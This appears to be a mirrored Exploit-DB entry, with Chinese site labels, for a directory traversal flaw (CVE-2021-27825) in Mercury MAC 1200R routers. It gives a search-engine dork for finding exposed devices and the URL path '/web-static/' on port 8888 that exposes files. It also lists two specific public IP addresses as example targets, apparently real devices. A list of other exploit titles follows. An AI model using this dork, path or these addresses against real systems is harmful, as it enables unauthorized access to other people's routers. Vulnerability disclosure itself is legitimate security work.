MAC 1200R – Directory Traversal

Exploit Database
90 阅读

作者： Chunlei Shang, Jiangsu Public Information Co., Ltd.

日期： 2023-04-07
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51315/

# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825

1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888". 
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1）http://60.251.151.2:8888/web-static/

2）http://222.215.15.70:8888/web-static/

last Exploits
MAC 1200R – Directory Traversal的更多信息

Code Widgets DataBound Index Style Menu – ‘category.asp’ SQL Injection：
WordPress Plugin Spider Catalog 1.1 – HTML Code Injection / Cross-Site Scripting：
MyCustomers CMS 1.3.873 – SQL Injection：
RiteCMS 1.0.0 – Multiple Vulnerabilities：
eWebeditor – Directory Traversal：
Joomla! Component Sponsor Wall 7.0 – ‘wallid’ SQL Injection：
Belkin AC1200 Router Firmware 1.00.27 – Authentication Bypass：
Joomla! Component BeeHeard 1.0 – Local File Inclusion：